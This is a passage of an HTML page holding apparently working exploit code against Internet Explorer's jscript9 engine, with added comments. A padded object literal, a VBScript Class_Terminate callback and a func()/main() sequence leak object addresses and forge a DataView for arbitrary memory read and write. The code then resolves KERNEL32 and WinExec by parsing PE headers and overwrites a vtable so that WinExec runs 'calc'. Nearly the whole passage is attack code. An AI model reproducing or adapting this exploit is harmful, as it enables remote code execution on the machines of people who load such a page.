p2000:1,p2001:1,p2002:1,p2003:1,p2004:1,p2005:1,p2006:1,p2007:1,p2008:1,p2009:1,p2010:1,p2011:1,p2012:1,p2013:1,p2014:1,p2015:1,p2016:1,p2017:1,p2018:1,p2019:1,p2020:1,p2021:1,p2022:1,p2023:1,p2024:1,p2025:1,p2026:1,p2027:1,p2028:1,p2029:1,p2030:1,p2031:1,p2032:1,p2033:1,p2034:1,p2035:1,p2036:1,p2037:1,p2038:1,p2039:1,p2040:1,p2041:1,p2042:1,p2043:1,p2044:1,p2045:1,p2046:1,p2047:1,p2048:1,p2049:1,p2050:1,p2051:1,p2052:1,p2053:1,p2054:1,p2055:1,p2056:1,p2057:1,p2058:1,p2059:1,p2060:1,p2061:1,p2062:1,p2063:1,p2064:1,p2065:1,p2066:1,p2067:1,p2068:1,p2069:1,p2070:1,p2071:1,p2072:1,p2073:1,p2074:1,p2075:1,p2076:1,p2077:1,p2078:1,p2079:1,p2080:1,p2081:1,p2082:1,p2083:1,p2084:1,p2085:1,p2086:1,p2087:1,p2088:1,p2089:1,p2090:1,p2091:1,p2092:1,p2093:1,p2094:1,p2095:1,p2096:1,p2097:1,p2098:1,p2099:1,
p2100:1,p2101:1,p2102:1,p2103:1,p2104:1,p2105:1,p2106:1,p2107:1,p2108:1,p2109:1,p2110:1,p2111:1,p2112:1,p2113:1,p2114:1,p2115:1,p2116:1,p2117:1,p2118:1,p2119:1,p2120:1,p2121:1,p2122:1,p2123:1,p2124:1,p2125:1,p2126:1,p2127:1,p2128:1,p2129:1,p2130:1,p2131:1,p2132:1,p2133:1,p2134:1,p2135:1,p2136:1,p2137:1,p2138:1,p2139:1,p2140:1,p2141:1,p2142:1,p2143:1,p2144:1,p2145:1,p2146:1,p2147:1,p2148:1,p2149:1,p2150:1,p2151:1,p2152:1,p2153:1,p2154:1,p2155:1,p2156:1,p2157:1,p2158:1,p2159:1,p2160:1,p2161:1,p2162:1,p2163:1,p2164:1,p2165:1,p2166:1,p2167:1,p2168:1,p2169:1,p2170:1,p2171:1,p2172:1,p2173:1,p2174:1,p2175:1,p2176:1,p2177:1,p2178:1,p2179:1,p2180:1,p2181:1,p2182:1,p2183:1,p2184:1,p2185:1,p2186:1,p2187:1,p2188:1,p2189:1,p2190:1,p2191:1,p2192:1,p2193:1,p2194:1,p2195:1,p2196:1,p2197:1,p2198:1,p2199:1,
p2200:1,p2201:1,p2202:1,p2203:1,p2204:1,p2205:1,p2206:1,p2207:1,p2208:1,p2209:1,p2210:1,p2211:1,p2212:1,p2213:1,p2214:1,p2215:1,p2216:1,p2217:1,p2218:1,p2219:1,p2220:1,p2221:1,p2222:1,p2223:1,p2224:1,p2225:1,p2226:1,p2227:1,p2228:1,p2229:1,p2230:1,p2231:1,p2232:1,p2233:1,p2234:1,p2235:1,p2236:1,p2237:1,p2238:1,p2239:1,p2240:1,p2241:1,p2242:1,p2243:1,p2244:1,p2245:1,p2246:1,p2247:1,p2248:1,p2249:1,p2250:1,p2251:1,p2252:1,p2253:1,p2254:1,p2255:1,p2256:1,p2257:1,p2258:1,p2259:1,p2260:1,p2261:1,p2262:1,p2263:1,p2264:1,p2265:1,p2266:1,p2267:1,p2268:1,p2269:1,p2270:1,p2271:1,p2272:1,p2273:1,p2274:1,p2275:1,p2276:1,p2277:1,p2278:1,p2279:1,p2280:1,p2281:1,p2282:1,p2283:1,p2284:1,p2285:1,p2286:1,p2287:1,p2288:1,p2289:1,p2290:1,p2291:1,p2292:1,p2293:1,p2294:1,p2295:1,p2296:1,p2297:1,p2298:1,p2299:1,
p2300:1,p2301:1,p2302:1,p2303:1,p2304:1,p2305:1,p2306:1,p2307:1,p2308:1,p2309:1,p2310:1,p2311:1,p2312:1,p2313:1,p2314:1,p2315:1,p2316:1,p2317:1,p2318:1,p2319:1,p2320:1,p2321:1,p2322:1,p2323:1,p2324:1,p2325:1,p2326:1,p2327:1,p2328:1,p2329:1,p2330:1,p2331:1,p2332:1,p2333:1,p2334:1,p2335:1,p2336:1,p2337:1,p2338:1,p2339:1,p2340:1,p2341:1,p2342:1,p2343:1,p2344:1,p2345:1,p2346:1,p2347:1,p2348:1,p2349:1,p2350:1,p2351:1,p2352:1,p2353:1,p2354:1,p2355:1,p2356:1,p2357:1,p2358:1,p2359:1,p2360:1,p2361:1,p2362:1,p2363:1,p2364:1,p2365:1,p2366:1,p2367:1,p2368:1,p2369:1,p2370:1,p2371:1,p2372:1,p2373:1,p2374:1,p2375:1,p2376:1,p2377:1,p2378:1,p2379:1,p2380:1,p2381:1,p2382:1,p2383:1,p2384:1,p2385:1,p2386:1,p2387:1,p2388:1,p2389:1,p2390:1,p2391:1,p2392:1,p2393:1,p2394:1,p2395:1,p2396:1,p2397:1,p2398:1,p2399:1,
p2400:1,p2401:1,p2402:1,p2403:1,p2404:1,p2405:1,p2406:1,p2407:1,p2408:1,p2409:1,p2410:1,p2411:1,p2412:1,p2413:1,p2414:1,p2415:1,p2416:1,p2417:1,p2418:1,p2419:1,p2420:1,p2421:1,p2422:1,p2423:1,p2424:1,p2425:1,p2426:1,p2427:1,p2428:1,p2429:1,p2430:1,p2431:1,p2432:1,p2433:1,p2434:1,p2435:1,p2436:1,p2437:1,p2438:1,p2439:1,p2440:1,p2441:1,p2442:1,p2443:1,p2444:1,p2445:1,p2446:1,p2447:1,p2448:1,p2449:1,p2450:1,p2451:1,p2452:1,p2453:1,p2454:1,p2455:1,p2456:1,p2457:1,p2458:1,p2459:1,p2460:1,p2461:1,p2462:1,p2463:1,p2464:1,p2465:1,p2466:1,p2467:1,p2468:1,p2469:1,p2470:1,p2471:1,p2472:1,p2473:1,p2474:1,p2475:1,p2476:1,p2477:1,p2478:1,p2479:1,p2480:1,p2481:1,p2482:1,p2483:1,p2484:1,p2485:1,p2486:1,p2487:1,p2488:1,p2489:1,p2490:1,p2491:1,p2492:1,p2493:1,p2494:1,p2495:1,p2496:1,p2497:1,p2498:1,p2499:1,
p2500:1,p2501:1,p2502:1,p2503:1,p2504:1,p2505:1,p2506:1,p2507:1,p2508:1,p2509:1,p2510:1,p2511:1,p2512:1,p2513:1,p2514:1,p2515:1,p2516:1,p2517:1,p2518:1,p2519:1,p2520:1,p2521:1,p2522:1,p2523:1,p2524:1,p2525:1,p2526:1,p2527:1,p2528:1,p2529:1,p2530:1,p2531:1,p2532:1,p2533:1,p2534:1,p2535:1,p2536:1,p2537:1,p2538:1,p2539:1,p2540:1,p2541:1,p2542:1,p2543:1,p2544:1,p2545:1,p2546:1,p2547:1,p2548:1,p2549:1,p2550:1,p2551:1,p2552:1,p2553:1,p2554:1,p2555:1,p2556:1,p2557:1,p2558:1,p2559:1,p2560:1,p2561:1,p2562:1,p2563:1,p2564:1,p2565:1,p2566:1,p2567:1,p2568:1,p2569:1,p2570:1,p2571:1,p2572:1,p2573:1,p2574:1,p2575:1,p2576:1,p2577:1,p2578:1,p2579:1,p2580:1,p2581:1,p2582:1,p2583:1,p2584:1,p2585:1,p2586:1,p2587:1,p2588:1,p2589:1,p2590:1,p2591:1,p2592:1,p2593:1,p2594:1,p2595:1,p2596:1,p2597:1,p2598:1,p2599:1,
p2600:1,p2601:1,p2602:1,p2603:1,p2604:1,p2605:1,p2606:1,p2607:1,p2608:1,p2609:1,p2610:1,p2611:1,p2612:1,p2613:1,p2614:1,p2615:1,p2616:1,p2617:1,p2618:1,p2619:1,p2620:1,p2621:1,p2622:1,p2623:1,p2624:1,p2625:1,p2626:1,p2627:1,p2628:1,p2629:1,p2630:1,p2631:1,p2632:1,p2633:1,p2634:1,p2635:1,p2636:1,p2637:1,p2638:1,p2639:1,p2640:1,p2641:1,p2642:1,p2643:1,p2644:1,p2645:1,p2646:1,p2647:1,p2648:1,p2649:1,p2650:1,p2651:1,p2652:1,p2653:1,p2654:1,p2655:1,p2656:1,p2657:1,p2658:1,p2659:1,p2660:1,p2661:1,p2662:1,p2663:1,p2664:1,p2665:1,p2666:1,p2667:1,p2668:1,p2669:1,p2670:1,p2671:1,p2672:1,p2673:1,p2674:1,p2675:1,p2676:1,p2677:1,p2678:1,p2679:1,p2680:1,p2681:1,p2682:1,p2683:1,p2684:1,p2685:1,p2686:1,p2687:1,p2688:1,p2689:1,p2690:1,p2691:1,p2692:1,p2693:1,p2694:1,p2695:1,p2696:1,p2697:1,p2698:1,p2699:1,
p2700:1,p2701:1,p2702:1,p2703:1,p2704:1,p2705:1,p2706:1,p2707:1,p2708:1,p2709:1,p2710:1,p2711:1,p2712:1,p2713:1,p2714:1,p2715:1,p2716:1,p2717:1,p2718:1,p2719:1,p2720:1,p2721:1,p2722:1,p2723:1,p2724:1,p2725:1,p2726:1,p2727:1,p2728:1,p2729:1,p2730:1,p2731:1,p2732:1,p2733:1,p2734:1,p2735:1,p2736:1,p2737:1,p2738:1,p2739:1,p2740:1,p2741:1,p2742:1,p2743:1,p2744:1,p2745:1,p2746:1,p2747:1,p2748:1,p2749:1,p2750:1,p2751:1,p2752:1,p2753:1,p2754:1,p2755:1,p2756:1,p2757:1,p2758:1,p2759:1,p2760:1,p2761:1,p2762:1,p2763:1,p2764:1,p2765:1,p2766:1,p2767:1,p2768:1,p2769:1,p2770:1,p2771:1,p2772:1,p2773:1,p2774:1,p2775:1,p2776:1,p2777:1,p2778:1,p2779:1,p2780:1,p2781:1,p2782:1,p2783:1,p2784:1,p2785:1,p2786:1,p2787:1,p2788:1,p2789:1,p2790:1,p2791:1,p2792:1,p2793:1,p2794:1,p2795:1,p2796:1,p2797:1,p2798:1,p2799:1,
p2800:1,p2801:1,p2802:1,p2803:1,p2804:1,p2805:1,p2806:1,p2807:1,p2808:1,p2809:1,p2810:1,p2811:1,p2812:1,p2813:1,p2814:1,p2815:1,p2816:1,p2817:1,p2818:1,p2819:1,p2820:1,p2821:1,p2822:1,p2823:1,p2824:1,p2825:1,p2826:1,p2827:1,p2828:1,p2829:1,p2830:1,p2831:1,p2832:1,p2833:1,p2834:1,p2835:1,p2836:1,p2837:1,p2838:1,p2839:1,p2840:1,p2841:1,p2842:1,p2843:1,p2844:1,p2845:1,p2846:1,p2847:1,p2848:1,p2849:1,p2850:1,p2851:1,p2852:1,p2853:1,p2854:1,p2855:1,p2856:1,p2857:1,p2858:1,p2859:1,p2860:1,p2861:1,p2862:1,p2863:1,p2864:1,p2865:1,p2866:1};
if (!stop)
return;
// Only once stop is set: publish ga and fo through a2, rewrite arr[0] from arr[1],
// and capture arr[1]/arr[2] into u32 (main() reads them back as ga_addr and fo_addr).
a2[1] = ga;
a2[2] = fo;
arr[0] = arr[1] + 0x38;
u32[0] = arr[1];
u32[1] = arr[2];
arr[1] = 1;
}
//for (var i = 0; i < 1000; i++)
// func([1.1], [], 1);
// Entry point, scheduled with setTimeout at the bottom of the page. Calls func(a, a)
// until `stop` is set, takes u32[0]/u32[1] as ga_addr/fo_addr, fills ga[0..7], makes a[0]
// the shared `dv`, resolves jscript9, KERNEL32 and WinExec through the PE-parsing
// helpers above, and writes 'calc' at cmd_addr. Requires the IE10 document mode
// requested by the x-ua-compatible meta tag at the top of the page.
function main() {
ggg = a;
stop = false;
var i = 0;
// func() returns early while stop is false; stop is set by ff(), which the VBScript
// Class_Terminate handler calls, and by the final script block.
for (; i < 0x100000 && !stop; ++ i) {
func(a, a);
}
// func() copied arr[1]/arr[2] into u32[0]/u32[1] once stop was set.
ga_addr = u32[0];
fo_addr = u32[1];
dv_addr = ga_addr + 0x38;
// ga[7] is the same slot that setDataAddress() overwrites on every read/write (0x1c / 4).
ga[0] = 0x2e;
ga[1] = dv_addr;
ga[2] = dv_addr - 0x210;
ga[3] = 0;
ga[4] = ga_addr + 0x24;
ga[5] = 0;
ga[6] = -1;
ga[7] = dv_addr;
// From here on a[0] is the receiver for every DataView.prototype.* call in the helpers.
dv = a[0];
var rdv = new DataView(new ArrayBuffer(8));
// 32-bit value 4 bytes past rdv's leaked address; stored into ga[1] below.
var rtype = readPointer(leakObjectAddress(rdv) + 4);
// Fix fake DataView->type
ga[0x04 / 4] = rtype;
var space = new DataView(new ArrayBuffer(0x200));
// 32-bit value 0x1c past space's leaked address; used below as the base of a 0x200-byte
// scratch area (that it is the buffer address cannot be confirmed from this file).
var space_addr = readPointer(leakObjectAddress(space) + 0x1c);
var fake_vtable_addr = space_addr;
var cmd_addr = space_addr + 0x100;
var target_arr = new Array( 1, 2, 3, 4, 5 );
var target_arr_addr = leakObjectAddress(target_arr);
// Implicit globals (no `var`). The first 32-bit word of target_arr's object is used as
// an address inside jscript9 to locate its image base.
jscript9_base = getModuleBase(readPointer(target_arr_addr));
kernel32_base = getModuleBaseFromIAT(jscript9_base, 'KERNEL32');
var winexec = getProcAddress( kernel32_base, 'WinExec' );
// Replaces target_arr's first word with fake_vtable_addr and stores winexec at +0x7C of it.
write32( target_arr_addr, fake_vtable_addr );
write32( fake_vtable_addr + 0x7C, winexec );
writeString(cmd_addr, 'calc');
// `in` lookup with a numeric key on target_arr; the block is empty, so the statement
// exists only for the property lookup it performs.
if ( cmd_addr in target_arr ) {}
// Reached only if the lookup above returns normally.
alert("wtf?");
}
// arr receives the VBScript object o in the final script block (arr.push(o)).
// arr_arr is declared here but not referenced anywhere else on this page.
var arr = new Array();
var arr_arr = new Array();
// Called from the VBScript Class_Terminate handler of cla0. Replaces ggg[0] (ggg is a,
// set in main()) with a fresh object and raises the stop flag, which ends main()'s
// func() loop.
function ff()
{
ggg[0] = {};
stop = true;
}
</script>
<script type="text/vbscript">
' Shared with the JScript blocks on this page: the final script pushes o into arr and then nulls it.
Dim o
' Class whose only member is a termination handler; it calls the JScript function ff()
' (which sets stop = true and replaces ggg[0]). Class_Terminate runs when the instance is destroyed.
Class cla0
Private Sub Class_Terminate
call ff
End Sub
End Class
' Creates the single instance; the JScript side later drops its references to it.
Set o = new cla0
</script>
<script language='javascript'>
// Runs after the VBScript block has created o. Sets stop so func() executes its full
// body, calls it 10000 times with a fresh [{}, {}] as a2, stores o in arr, then drops
// both references to it (o and arr[0]) — presumably so that cla0's Class_Terminate,
// which calls ff(), fires later — and finally schedules main() on a 1 ms timer.
stop = true;
for (var i = 0; i < 10000; ++ i)
func(a, [{}, {}]);
arr.push(o);
o = null;
arr[0] = null;
setTimeout(main, 1);
</script>